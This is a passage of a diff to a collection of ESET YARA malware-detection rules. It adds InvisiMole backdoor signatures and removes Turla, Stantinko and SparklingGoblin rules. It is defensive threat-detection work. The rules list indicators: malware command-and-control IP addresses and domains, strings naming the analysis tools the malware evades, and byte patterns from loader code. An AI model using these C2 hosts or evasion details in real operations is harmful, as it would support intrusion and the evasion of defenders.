+		$d = "DnsQuery_A"
+		$s1 = "Wireshark-is-running-{9CA78EEA-EA4D-4490-9240-FC01FCEF464B}" xor
+		$s2 = "AddIns\\" ascii wide xor
+		$s3 = "pcornomeex." xor
+		$s4 = "weriahsek.rxe" xor
+		$s5 = "dpmupaceex." xor
+		$s6 = "TCPViewClass" xor
+		$s7 = "PROCMON_WINDOW_CLASS" xor
+		$s8 = "Key%C"
+		$s9 = "AutoEx%C" xor
+		$s10 = "MSO~"
+		$s11 = "MDE~"
+		$s12 = "DNS PLUGIN, Step %d" xor
+		$s13 = "rundll32.exe \"%s\",StartUI"
+
+	condition:
+		(( uint16( 0 ) == 0x5A4D ) or ESET_Invisimole_Blob_PRIVATE ) and $d and 5 of ( $s* )
+}
+rule ESET_Apt_Windows_Invisimole_RC2CL_Backdoor : FILE
+{
+	meta:
+		description = "InvisiMole RC2CL backdoor"
+		author = "ESET Research"
+		id = "0228b8ee-bf03-504e-8cdf-8a1c9a79d54e"
+		date = "2021-05-17"
+		modified = "2021-05-17"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L172-L213"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "c38550023515d33eaaf0669cc8b874bcfd09653a07c7edbf72e3344d1cf31541"
+		score = 75
+		quality = 78
+		tags = "FILE"
+		license = "BSD 2-Clause"
+		version = "1"
+
+	strings:
+		$s1 = "RC2CL" wide
+		$s2 = "hp12KsNh92Dwd" wide
+		$s3 = "ZLib package %s: files: %d, total size: %d" wide
+		$s4 = "\\Un4seen" wide
+		$s5 = {9E 01 3A AD}
+		$s6 = "~mrc_" wide
+		$s7 = "~src_" wide
+		$s8 = "~wbc_" wide
+		$s9 = "zdf_" wide
+		$s10 = "~S0PM" wide
+		$s11 = "~A0FM" wide
+		$s12 = "~70Z63\\" wide
+		$s13 = "~E070C" wide
+		$s14 = "~N031E" wide
+		$s15 = "%szdf_%s.data" wide
+		$s16 = "%spicture.crd" wide
+		$s17 = "%s70zf_%s.cab" wide
+		$s18 = "%spreview.crd" wide
+		$s19 = "Value_Bck" wide
+		$s20 = "Value_WSFX_ZC" wide
+		$s21 = "MachineAccessStateData" wide
+		$s22 = "SettingsSR2" wide
 
 	condition:
-		for any i in ( 0 .. pe.number_of_signatures - 1 ) : ( pe.signatures [ i ] . subject contains "Solid Loop" or pe.signatures [ i ] . subject contains "Ultimate Computer Support" )
+		(( uint16( 0 ) == 0x5A4D ) or ESET_Invisimole_Blob_PRIVATE ) and 5 of ( $s* )
 }
-rule ESET_Gazer_Certificate : FILE
+rule ESET_Apt_Windows_Invisimole : FILE
 {
 	meta:
-		description = "Turla Gazer malware"
+		description = "InvisiMole magic values, keys and strings"
 		author = "ESET Research"
-		id = "e90bbe53-4e7f-59c4-a505-4893150bf824"
-		date = "2017-08-30"
-		modified = "2017-08-29"
+		id = "4d48996b-9792-57ba-a302-349220323712"
+		date = "2021-05-17"
+		modified = "2021-05-17"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/turla/gazer.yar#L48-L65"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L215-L255"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "eb3afbaefd23d4fc6ded494d3378dc910a0832b160e733ab79c590128dd74cea"
+		logic_hash = "7a2cff9febe77d718089ba4e1a33f3487594588892e418cec685bf22b156fa2b"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		contact = "github@eset.com"
 		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$certif1 = {52 76 a4 53 cd 70 9c 18 da 65 15 7e 5f 1f de 02}
-		$certif2 = {12 90 f2 41 d9 b2 80 af 77 fc da 12 c6 b4 96 9c}
+		$s1 = "CryptProtectData"
+		$s2 = "CryptUnprotectData"
+		$s3 = {9E 01 3A AD}
+		$s4 = "GET /getversion2a/%d%.2X%.2X/U%sN HTTP/1.1"
+		$s5 = "PULSAR_LOADER.dll"
+		$check_magic_old_32 = {3? F9 FF D0 DE}
+		$check_magic_old_64 = {3? 64 FF D0 DE}
+		$check_magic_new_32 = {81 3? 86 DA 11 CE}
+		$check_magic_new_64 = {81 3? 64 DA 11 CE}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d ) and 1 of them and filesize < 2MB
+		(( uint16( 0 ) == 0x5A4D ) or ESET_Invisimole_Blob_PRIVATE ) and ( any of ( $check_magic* ) ) and ( 2 of ( $s* ) )
 }
-rule ESET_Gazer_Logfile_Name : FILE
+rule ESET_Apt_Windows_Invisimole_C2 : FILE
 {
 	meta:
-		description = "Turla Gazer malware"
+		description = "InvisiMole C&C servers"
 		author = "ESET Research"
-		id = "3e1454e9-dddf-5197-b486-b96d725fdb58"
-		date = "2017-08-30"
-		modified = "2017-08-29"
+		id = "9279c8cd-2c16-5f90-a7f5-e668d57c805b"
+		date = "2021-05-17"
+		modified = "2021-05-17"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/turla/gazer.yar#L67-L85"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L257-L297"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "b50553f4b4b07f124e5bd390e7dc8ac6b60a8ef185f3bc227894f957d6483478"
+		logic_hash = "aff8456ce7a9ebe875c02e51c09b77ee7b1fddfc11d4ad236e12c8c5240a01a8"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
-		contact = "github@eset.com"
 		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$s1 = "CVRG72B5.tmp.cvr"
-		$s2 = "CVRG1A6B.tmp.cvr"
-		$s3 = "CVRG38D9.tmp.cvr"
+		$s1 = "46.165.220.228" ascii wide
+		$s2 = "80.255.3.66" ascii wide
+		$s3 = "85.17.26.174" ascii wide
+		$s4 = "185.193.38.55" ascii wide
+		$s5 = "194.187.249.157" ascii wide
+		$s6 = "195.154.255.211" ascii wide
+		$s7 = "153.re" ascii wide fullword
+		$s8 = "adstat.red" ascii wide
+		$s9 = "adtrax.net" ascii wide
+		$s10 = "akamai.sytes.net" ascii wide
+		$s11 = "amz-eu401.com" ascii wide
+		$s12 = "blabla234342.sytes.net" ascii wide
+		$s13 = "mx1.be" ascii wide fullword
+		$s14 = "statad.de" ascii wide
+		$s15 = "time.servehttp.com" ascii wide
+		$s16 = "upd.re" ascii wide fullword
+		$s17 = "update.xn--6frz82g" ascii wide
+		$s18 = "updatecloud.sytes.net" ascii wide
+		$s19 = "updchecking.sytes.net" ascii wide
+		$s20 = "wlsts.net" ascii wide
+		$s21 = "ro2.host" ascii wide fullword
+		$s22 = "2ld.xyz" ascii wide fullword
+		$s23 = "the-haba.com" ascii wide
+		$s24 = "82.202.172.134" ascii wide
+		$s25 = "update.xn--6frz82g" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d ) and 1 of them
+		(( uint16( 0 ) == 0x5A4D ) or ESET_Invisimole_Blob_PRIVATE ) and $s21 and any of them
 }
 rule ESET_Generic_Carbon : FILE
 {
@@ -69125,984 +70084,77 @@ rule ESET_Turla_Outlook_Exports
 		(pe.exports ( "install" ) or pe.exports ( "Install" ) ) and pe.exports ( "TBP_Initialize" ) and pe.exports ( "TBP_Finalize" ) and pe.exports ( "TBP_GetName" ) and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DllGetClassObject" )
 }
 
-rule ESET_Beds_Plugin
-{
-	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "7c038e92-1064-503e-9d63-2d2c10f1759e"
-		date = "2017-07-17"
-		modified = "2017-07-20"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L34-L51"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "024cb91288f133e4cdf5993ac0477de6de76d38fa06f7affa348c6a28a4600da"
-		score = 75
-		quality = 80
-		tags = ""
-		Author = "Frédéric Vachon"
-		Description = "Stantinko BEDS' plugins"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
-
-	condition:
-		pe.exports( "CheckDLLStatus" ) and pe.exports ( "GetPluginData" ) and pe.exports ( "InitializePlugin" ) and pe.exports ( "IsReleased" ) and pe.exports ( "ReleaseDLL" )
-}
-
-rule ESET_Beds_Dropper
-{
-	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "47ccab59-253f-55d4-b38a-4441802626fc"
-		date = "2017-07-17"
-		modified = "2017-07-20"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L53-L67"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "4b5d121e182e3fddd766a7a1227c5de273995e9336156e7a6e8a17faad681bea"
-		score = 75
-		quality = 80
-		tags = ""
-		Author = "Frédéric Vachon"
-		Description = "BEDS dropper"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
-
-	condition:
-		pe.imphash( ) == "a7ead4ef90d9981e25728e824a1ba3ef"
-}
-rule ESET_Facebook_Bot : FILE
-{
-	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "643b137f-af79-584c-8266-f2335a79f1ba"
-		date = "2017-07-17"
-		modified = "2017-07-20"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L69-L100"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "8ea779f90fa6080398403e3e6f9d342360c35e93c756ed43cb699f090106504e"
-		score = 75
-		quality = 55
-		tags = "FILE"
-		Author = "Frédéric Vachon"
-		Description = "Stantinko's Facebook bot"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
-
-	strings:
-		$s1 = "m_upload_pic&return_uri=https%3A%2F%2Fm.facebook.com%2Fprofile.php" fullword ascii
-		$s2 = "D:\\work\\brut\\cms\\facebook\\facebookbot\\Release\\facebookbot.pdb" fullword ascii
-		$s3 = "https%3A%2F%2Fm.facebook.com%2Fcomment%2Freplies%2F%3Fctoken%3D" fullword ascii
-		$s4 = "reg_fb_gate=https%3A%2F%2Fm.facebook.com%2Freg" fullword ascii
-		$s5 = "reg_fb_ref=https%3A%2F%2Fm.facebook.com%2Freg%2F" fullword ascii
-		$s6 = "&return_uri_error=https%3A%2F%2Fm.facebook.com%2Fprofile.php" fullword ascii
-		$x1 = "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36" fullword ascii
-		$x2 = "registration@facebookmail.com" fullword ascii
-		$x3 = "https://m.facebook.com/profile.php?mds=" fullword ascii
-		$x4 = "https://upload.facebook.com/_mupload_/composer/?profile&domain=" fullword ascii
-		$x5 = "http://staticxx.facebook.com/connect/xd_arbiter.php?version=42#cb=ff43b202c" fullword ascii
-		$x6 = "https://upload.facebook.com/_mupload_/photo/x/saveunpublished/" fullword ascii
-		$x7 = "m.facebook.com&ref=m_upload_pic&waterfall_source=" fullword ascii
-		$x8 = "payload.commentID" fullword ascii
-		$x9 = "profile.login" fullword ascii
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $s* ) or 3 of ( $x* ) ) ) or ( all of them )
-}
-rule ESET_Pds_Plugins : FILE
-{
-	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "dfa75db5-f21c-5b5e-84ba-3bfdcc3efdcd"
-		date = "2017-07-17"
-		modified = "2017-07-20"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L102-L130"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "26bbd380b72fb45206178639d67c8737b9984b140ba1048432949e159946c847"
-		score = 75
-		quality = 80
-		tags = "FILE"
-		Author = "Frédéric Vachon"
-		Description = "Stantinko PDS' plugins"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
-
-	strings:
-		$s1 = "std::_Vector_val<CHTTPPostItem *,std::allocator<CHTTPPostItem *> >" fullword ascii
-		$s2 = "std::_Vector_val<CHTTPHeader *,std::allocator<CHTTPHeader *> >" fullword ascii
-		$s3 = "std::vector<CHTTPHeader *,std::allocator<CHTTPHeader *> >" fullword ascii
-		$s4 = "std::vector<CHTTPPostItem *,std::allocator<CHTTPPostItem *> >" fullword ascii
-		$s5 = "CHTTPHeaderManager" fullword ascii
-		$s6 = "CHTTPPostItemManager *" fullword ascii
-		$s7 = "CHTTPHeaderManager *" fullword ascii
-		$s8 = "CHTTPPostItemManager" fullword ascii
-		$s9 = "CHTTPHeader" fullword ascii
-		$s10 = "CHTTPPostItem" fullword ascii
-		$s11 = "std::vector<CCookie *,std::allocator<CCookie *> >" fullword ascii
-		$s12 = "std::_Vector_val<CCookie *,std::allocator<CCookie *> >" fullword ascii
-		$s13 = "CCookieManager *" fullword ascii
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 2 of ( $s* ) ) )
-}
-rule ESET_Stantinko_Pdb
-{
-	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "24694e53-b89e-5cd3-ad53-e738bbd7d69d"
-		date = "2017-07-17"
-		modified = "2017-07-20"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L132-L148"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "902c0ee086ce1a8def831d2f30c868165198c6c304faac3a93116a524f8e2fbf"
-		score = 75
-		quality = 80
-		tags = ""
-		Author = "Frédéric Vachon"
-		Description = "Stantinko malware family PDB path"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
-
-	strings:
-		$s1 = "D:\\work\\service\\service\\" ascii
-
-	condition:
-		all of them
-}
-rule ESET_Stantinko_Droppers : FILE
-{
-	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "fe2e6987-929a-59e3-a9ec-01a9f55fe589"
-		date = "2017-07-17"
-		modified = "2017-07-20"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L150-L170"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "c56fc85834a3e1bb1c14da37fb509c7de3009bf81d52800fe0093dc489f6deaa"
-		score = 75
-		quality = 80
-		tags = "FILE"
-		Author = "Marc-Etienne M.Léveillé"
-		Description = "Stantinko droppers"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
-
-	strings:
-		$s1 = {55 8B EC 83 EC 08 53 56 BE 80 F4 45 00 57 81 EE 80 0E 41 00 56 E8 6D 23 00 00 56 8B D8 68 80 0E 41 00 53 89 5D F8 E8 65 73 00 00 8B 0D FC F5 45}
-		$s2 = {7E 5E 7F 8C 08 46 00 00 AB 57 1A BB 91 5C 00 00 FA CC FD 76 90 3A 00 00}
-
-	condition:
-		uint16( 0 ) == 0x5A4D and 1 of them
-}
-
-rule ESET_Stantinko_D3D
-{
-	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "6652e55c-96a0-55a7-9941-7f32bbf984e5"
-		date = "2017-07-17"
-		modified = "2017-07-20"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L172-L187"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "4e8da3f11df15e4aa469db62961ae390c4c4df2a5335eec0bdab19b14cc8343d"
-		score = 75
-		quality = 80
-		tags = ""
-		Author = "Marc-Etienne M.Léveillé"
-		Description = "Stantinko d3dadapter component"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
-
-	condition:
-		pe.exports( "EntryPoint" ) and pe.exports ( "ServiceMain" ) and pe.imports ( "WININET.DLL" , "HttpAddRequestHeadersA" )
-}
-rule ESET_Stantinko_Ihctrl32
-{
-	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "e8ab9f78-f438-5d9b-8407-e6c7e241da2c"
-		date = "2017-07-17"
-		modified = "2017-07-20"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L189-L209"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "1829e08fb2289f738d0e75ad9977169e9a94379da764b1766f23fa47e8bc2543"
-		score = 75
-		quality = 80
-		tags = ""
-		Author = "Marc-Etienne M.Léveillé"
-		Description = "Stantinko ihctrl32 component"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
-
-	strings:
-		$s1 = "ihctrl32.dll"
-		$s2 = "win32_hlp"
-		$s3 = "Ihctrl32Main"
-		$s4 = "I%citi%c%size%s%c%ci%s"
-		$s5 = "Global\\Intel_hctrl32"
-
-	condition:
-		2 of them
-}
-rule ESET_Stantinko_Wsaudio
-{
-	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "623f4ac7-03ec-52df-b7bf-0a2055453c52"
-		date = "2017-07-17"
-		modified = "2017-07-20"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L211-L233"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "45d92f1475f316ba50a9a4a3dd519d1186ed16c68bd2debe326736a1e3154562"
-		score = 75
-		quality = 80
-		tags = ""
-		Author = "Marc-Etienne M.Léveillé"
-		Description = "Stantinko wsaudio component"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
-
-	strings:
-		$s1 = "GetInterface"
-		$s2 = "wsaudio.dll"
-		$s3 = "Global\\Wsaudio_Initialize"
-		$s4 = "SOFTWARE\\Classes\\%s.FieldListCtrl.1\\"
-
-	condition:
-		2 of them
-}
-rule ESET_Stantinko_Ghstore
-{
-	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "ef9f0c27-35ea-5dd5-925f-09b6e043569d"
-		date = "2017-07-17"
-		modified = "2017-07-20"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L235-L255"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "e5628d6ffb2d3684264b3a88c4d7b5d2ce8983aa22badf5839ccb8ba2e3ef2d4"
-		score = 75
-		quality = 80
-		tags = ""
-		Author = "Marc-Etienne M.Léveillé"
-		Description = "Stantinko ghstore component"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
-
-	strings:
-		$s1 = "G%cost%sSt%c%s%s%ce%sr" wide
-		$s2 = "%cho%ct%sS%sa%c%s%crve%c" wide
-		$s3 = "Par%c%ce%c%c%s" wide
-		$s4 = "S%c%curity%c%s%c%s" wide
-		$s5 = "Sys%c%s%c%c%su%c%s%clS%c%s%serv%s%ces" wide
-
-	condition:
-		3 of them
-}
-rule ESET_Prikormka
-{
-	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "6073aa34-d385-5ae8-b97d-9b3d61015aae"
-		date = "2016-05-10"
-		modified = "2019-08-28"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/groundbait/prikormka.yar#L130-L141"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "f64195e680fbaefedba248aa15b37ed30ba72f42958cc48963a140165e951bff"
-		score = 75
-		quality = 80
-		tags = ""
-		Author = "Anton Cherepanov"
-		Description = "Operation Groundbait"
-		Contact = "threatintel@eset.com"
-		License = "BSD 2-Clause"
-
-	condition:
-		ESET_Prikormkadropper_PRIVATE or ESET_Prikormkamodule_PRIVATE or ESET_Prikormkaearlyversion_PRIVATE
-}
-
-rule ESET_Sparklinggoblin_Chacha20Loader_Richheader
-{
-	meta:
-		description = "Rule matching ChaCha20 loaders rich header"
-		author = "ESET Research"
-		id = "e1dac369-f25e-5cb3-aafa-b0c45f05b295"
-		date = "2021-03-30"
-		modified = "2021-08-26"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/sparklinggoblin/SparklingGoblin.yar#L33-L57"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		hash = "09ffe37a54bc4ebebd8d56098e4c76232f35d821"
-		hash = "29b147b76bb0d9e09f7297487cb972e6a2905586"
-		hash = "33f2c3de2457b758fc5824a2b253ad7c7c2e9e37"
-		hash = "45bef297ce78521eac6ee39e7603e18360e67c5a"
-		hash = "4cec7cdc78d95c70555a153963064f216dae8799"
-		hash = "4d4c1a062a0390b20732ba4d65317827f2339b80"
-		hash = "4f6949a4906b834e83ff951e135e0850fe49d5e4"
-		logic_hash = "a5c9595036dec0e0aef0a030c590189752217d15d3f53bf3dc537f5b43fae63e"
-		score = 75
-		quality = 80
-		tags = ""
-		license = "BSD 2-Clause"
-
-	condition:
-		pe.rich_signature.length>= 104 and pe.rich_signature.length <= 112 and pe.rich_signature.toolid ( 241 , 40116 ) >= 5 and pe.rich_signature.toolid ( 241 , 40116 ) <= 10 and pe.rich_signature.toolid ( 147 , 30729 ) == 11 and pe.rich_signature.toolid ( 264 , 24215 ) >= 15 and pe.rich_signature.toolid ( 264 , 24215 ) <= 16
-}
-rule ESET_Sparklinggoblin_Chacha20 : FILE
-{
-	meta:
-		description = "SparklingGoblin ChaCha20 implementations"
-		author = "ESET Research"
-		id = "c0caceca-f685-5786-82f6-3ab7435f8061"
-		date = "2021-05-20"
-		modified = "2021-08-26"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/sparklinggoblin/SparklingGoblin.yar#L59-L368"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b"
-		hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f"
-		hash = "8be6d5f040d0085c62b1459afc627707b0de89cf"
-		hash = "4668302969fe122874fb2447a80378dcb671c86b"
-		hash = "9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b"
-		hash = "9ce7650f2c08c391a35d69956e171932d116b8bd"
-		hash = "91b32e030a1f286e7d502ca17e107d4bfbd7394a"
-		logic_hash = "b742bc22e0ebbce40607cb109b4d6fb03a40c1fb223c8092d93346dd3dd22789"
-		score = 75
-		quality = 80
-		tags = "FILE"
-		license = "BSD 2-Clause"
-
-	strings:
-		$chunk_1 = {
-            8B 4D ??
-            56
-            8B 75 ??
-            57
-            8B 7D ??
-            8B 04 BB
-            01 04 93
-            8B 04 B3
-            33 04 93
-            C1 C0 10
-            89 04 B3
-            01 04 8B
-            8B 04 BB
-            33 04 8B
-            C1 C0 0C
-            89 04 BB
-            01 04 93
-            8B 04 B3
-            33 04 93
-            C1 C0 08
-            89 04 B3
-            01 04 8B
-            8B 04 BB
-            33 04 8B
-            C1 C0 07
-            89 04 BB
-        }
-		$chunk_2 = {
-            03 4D ??
-            44 03 C0
-            03 55 ??
-            33 F1
-            45 33 D8
-            C1 C6 10
-            44 33 F2
-            41 C1 C3 10
-            41 03 FB
-            41 C1 C6 10
-            45 03 E6
-            41 03 DA
-            44 33 CB
-            44 03 EE
-            41 C1 C1 10
-            8B C7
-            33 45 ??
-            45 03 F9
-            C1 C0 0C
-            44 03 C0
-            45 33 D8
-            44 89 45 ??
-            41 C1 C3 08
-            41 03 FB
-            44 8B C7
-            44 33 C0
-            41 8B C5
-            33 45 ??
-            C1 C0 0C
-            03 C8
-            41 C1 C0 07
-            33 F1
-            89 4D ??
-            C1 C6 08
-            44 03 EE
-            41 8B CD
-            33 C8
-            41 8B C4
-            33 45 ??
-            C1 C0 0C
-            03 D0
-            C1 C1 07
-            44 33 F2
-            89 55 ??
-            41 C1 C6 08
-            45 03 E6
-            41 8B D4
-            33 D0
-            41 8B C7
-            41 33 C2
-            C1 C2 07
-            C1 C0 0C
-            03 D8
-            44 33 CB
-            41 C1 C1 08
-            45 03 F9
-            45 8B D7
-            44 33 D0
-            8B 45 ??
-            03 C1
-            41 C1 C2 07
-            44 33 C8
-            89 45 ??
-            41 C1 C1 10
-            45 03 E1
-            41 8B C4
-            33 C1
-            8B 4D ??
-            C1 C0 0C
-            03 C8
-            44 33 C9
-            89 4D ??
-            89 4D ??
-            41 C1 C1 08
-            45 03 E1
-            41 8B CC
-            33 C8
-            8B 45 ??
-            C1 C1 07
-            89 4D ??
-            89 4D ??
-            03 C2
-            41 03 D8
-            89 45 ??
-            41 33 C3
-            C1 C0 10
-            44 03 F8
-            41 8B CF
-            33 CA
-            8B 55 ??
-        }
-		$chunk_3 = {
-            C7 45 ?? 65 78 70 61
-            4C 8D 45 ??
-            C7 45 ?? 6E 64 20 33
-            4D 8B F9
-            C7 45 ?? 32 2D 62 79
-            4C 2B C1
-            C7 45 ?? 74 65 20 6B
-        }
-		$chunk_4 = {
-            0F B6 02
-            0F B6 4A ??
-            C1 E1 08
-            0B C8
-            0F B6 42 ??
-            C1 E1 08
-            0B C8
-            0F B6 42 ??
-            C1 E1 08
-            0B C8
-            41 89 0C 10
-            48 8D 52 ??
-            49 83 E9 01
-        }
-		$chunk_5 = {
-            03 4D ??
-            44 03 C0
-            03 55 ??
-            33 F1
-            41 33 F8
-            C1 C6 10
-            44 33 F2
-            C1 C7 10
-            44 03 DF
-            41 C1 C6 10
-            45 03 E6
-            44 03 CB
-            45 33 D1
-            44 03 EE
-            41 C1 C2 10
-            41 8B C3
-            33 45 ??
-            45 03 FA
-            C1 C0 0C
-            44 03 C0
-            41 33 F8
-            44 89 45 ??
-            C1 C7 08
-            44 03 DF
-            45 8B C3
-            44 33 C0
-            41 8B C5
-            33 45 ??
-            C1 C0 0C
-            03 C8
-            41 C1 C0 07
-            33 F1
-            89 4D ??
-            C1 C6 08
-            44 03 EE
-            41 8B CD
-            33 C8
-            41 8B C4
-            33 45 ??
-            C1 C0 0C
-            03 D0
-            C1 C1 07
-            44 33 F2
-            89 55 ??
-            41 C1 C6 08
-            45 03 E6
-            41 8B D4
-            33 D0
-            41 8B C7
-            33 C3
-            C1 C2 07
-            C1 C0 0C
-            44 03 C8
-            45 33 D1
-            41 C1 C2 08
-            45 03 FA
-            41 8B DF
-            33 D8
-            8B 45 ??
-            03 C1
-            C1 C3 07
-            44 33 D0
-            89 45 ??
-            41 C1 C2 10
-            45 03 E2
-            41 8B C4
-            33 C1
-            8B 4D ??
-            C1 C0 0C
-            03 C8
-            44 33 D1
-            89 4D ??
-            89 4D ??
-            41 C1 C2 08
-            45 03 E2
-            41 8B CC
-            33 C8
-            8B 45 ??
-            C1 C1 07
-            89 4D ??
-            89 4D ??
-            03 C2
-            45 03 C8
-            89 45 ??
-            33 C7
-            C1 C0 10
-            44 03 F8
-            41 8B CF
-            33 CA
-            8B 55 ??
-            C1 C1 0C
-            03 D1
-            8B FA
-            89 55 ??
-            33 F8
-            89 55 ??
-            8B 55 ??
-            03 D3
-            C1 C7 08
-            44 03 FF
-            41 8B C7
-            33 C1
-            C1 C0 07
-            89 45 ??
-            89 45 ??
-            8B C2
-            33 C6
-            C1 C0 10
-            44 03 D8
-            41 33 DB
-            C1 C3 0C
-            03 D3
-            8B F2
